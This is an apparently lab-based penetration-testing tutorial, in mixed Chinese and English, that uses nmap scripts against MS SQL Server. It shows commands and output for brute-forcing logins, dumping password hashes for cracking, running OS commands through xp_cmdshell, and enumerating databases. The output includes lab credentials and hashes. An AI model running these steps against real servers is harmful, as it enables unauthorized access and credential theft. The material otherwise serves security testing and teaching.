Use nmap scripts to perform penetration tests on MS SQL Server to obtain information such as target usernames, database tables, etc.
#准备阶段
攻击机器:Kali (装有nmap)
目标机器:Windows Server 2019 (安装SQL Server 2016)
nmap comes with a series of scripts for testing, and the scripts for mssql can be queried with the following statement:
─$ locate *.nse | grep ms-sql
/usr/share/nmap/scripts/broadcast-ms-sql-discover.nse
/usr/share/nmap/scripts/ms-sql-brute.nse
/usr/share/nmap/scripts/ms-sql-config.nse
/usr/share/nmap/scripts/ms-sql-dac.nse
/usr/share/nmap/scripts/ms-sql-dump-hashes.nse
/usr/share/nmap/scripts/ms-sql-empty-password.nse
/usr/share/nmap/scripts/ms-sql-hasdbaccess.nse
/usr/share/nmap/scripts/ms-sql-info.nse
/usr/share/nmap/scripts/ms-sql-ntlm-info.nse
/usr/share/nmap/scripts/ms-sql-query.nse
/usr/share/nmap/scripts/ms-sql-tables.nse
/usr/share/nmap/scripts/ms-sql-xp-cmdshell.nse
#获取数据库版本信息
Use the ms-sql-info script to obtain information such as the version of the target database
nmap -p 1433 -Pn --script ms-sql-info 192.168.91.133
//-p 表示指定端口号、-Pn:不检测主机存活、--script 指定脚本
The information obtained is as follows:
#用户凭证爆破
Use the ms-sql-brute script to enumerate and blast database usernames and passwords
nmap -p 1433 -Pn --script ms-sql-brute --script-args userdb=mssql_user.txt,passdb=mssql_pass.txt 192.168.91.133
// --script-args 指定脚本参数;userdb= 指定用户名字典 ;passdb= 指定密码字典
Here are the results:
Obtained username and password:
sa:Password@123
pentest:123456
#执行SQL语句
Using the credentials obtained earlier, you can call the ms-sql-query script of nmap to execute SQL queries on the target
Here's how to use it:
nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="SQL查询语句" 192.168.91.133
Lists all databases on the target
nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="sp_databases" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 01:57 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00051s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
| [192.168.91.133:1433]
| Query: sp_databases
| DATABASE_NAME DATABASE_SIZE REMARKS
| ============= ============= =======
| master 7552 Null
| model 16384 Null
| msdb 21888 Null
|_ tempdb 16384 Null
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
#NetBIOS 信息收集
利用ms-sql-ntlm-info脚本对启用 了NTLM 身份验证的远程SQL Server主机NetBIOS信息进行收集。
The rationale is that sending an MS-TDS NTLM authentication request with invalid domains and null credentials will cause the remote service to respond with an NTLMSSP message that exfiltrates information including NetBIOS, DNS, and OS version.
nmap -p1433 -Pn --script ms-sql-ntlm-info 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:08 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00053s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-ntlm-info:
| Target_Name: WIN-8EIGFF6H8PR
| NetBIOS_Domain_Name: WIN-8EIGFF6H8PR
| NetBIOS_Computer_Name: WIN-8EIGFF6H8PR
| DNS_Domain_Name: WIN-8EIGFF6H8PR
| DNS_Computer_Name: WIN-8EIGFF6H8PR
|_ Product_Version: 10.0.17763
#MSSQL 密码哈希转储
mssql password hashes can be exported using ms-sql-dump-hashes, which can be used by tools such as John-the-ripper.
nmap -p 1433 -Pn --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:22 EDT
Nmap scan report for 192.168.91.133
Host is up (0.0011s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-dump-hashes:
| [192.168.91.133:1433]
| sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87
| ##MS_PolicyEventProcessingLogin##:0x02001be8e4066350f72d7043e3b6fe080efb16a0cf424a4a1f078d84509d013946acaf49c08fdb534044432e474422769e4d43baa399bb094aa532e1333f6ec9c4eb01b4120c
| ##MS_PolicyTsqlExecutionLogin##:0x02002f2e008251ee080daa07829e49ef4baf8624e26bc34a37096691751f83b4d7122f8bf1015db9ba5a519f483da5d366712c0fc54f8250ae8ce38db43e8e9f616cd0faab97
|_ pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
#命令执行
xp_cmdshell is a feature of Microsoft SQL Server that allows system administrators to execute operating system commands. By default, the xp_cmdshell option is disabled. If xp_cmdshell is enabled on the target server, you can use the ms-sql-xp-cmdshell script to execute system commands on the target machine.
nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
//ms-sql-xp-cmdshell.cmd= 指定要执行的命令
nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00047s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
| [192.168.91.133:1433]
| Command: ipconfig
| output
| ======
| Null
| Windows IP \xE9\x85\x8D\xE7\xBD\xAE
| Null
| Null
| \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:
| Null
| \xE8\xBF\x9E\xE6\x8E\xA5\xE7\x89\xB9\xE5\xAE\x9A\xE7\x9A\x84 DNS \xE5\x90\x8E\xE7\xBC\x80 . . . . . . . : localdomain
| \xE6\x9C\xAC\xE5\x9C\xB0\xE9\x93\xBE\xE6\x8E\xA5 IPv6 \xE5\x9C\xB0\xE5\x9D\x80. . . . . . . . : fe80::c0cf:a5e8:ba66:9b8d%6
| IPv4 \xE5\x9C\xB0\xE5\x9D\x80 . . . . . . . . . . . . : 192.168.91.133
| \xE5\xAD\x90\xE7\xBD\x91\xE6\x8E\xA9\xE7\xA0\x81 . . . . . . . . . . . . : 255.255.255.0
| \xE9\xBB\x98\xE8\xAE\xA4\xE7\xBD\x91\xE5\x85\xB3. . . . . . . . . . . . . : 192.168.91.2
|_ Null
#空密码登录测试
If the administrator sets the password to empty, then the attacker can log directly into the database.
You can use the ms-sql-empty-password script to test the SQL Server empty password login on the target
nmap -p1433 -Pn --script ms-sql-empty-password 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:36 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00056s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
| [192.168.91.133:1433]
|_ sa:<empty> => Login Success
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
#查看数据库表
ms-sql-tables 脚本可以列出目标的数据库表
Tips: By default, there is no database in MSSQL, you need to create a new database and insert tables, otherwise the following script will report an error.
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
nmap -p1433 -Pn --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 04:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00079s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables:
| [192.168.91.133:1433]
| pentest
| table column type length
| ===== ====== ==== ======
| Table_1 password nchar 40
| Table_1 username nchar 40
|
| Restrictions
| Output restricted to 2 tables (see ms-sql-tables.maxtables)
| Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_ No filter (see ms-sql-tables.keywords)
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds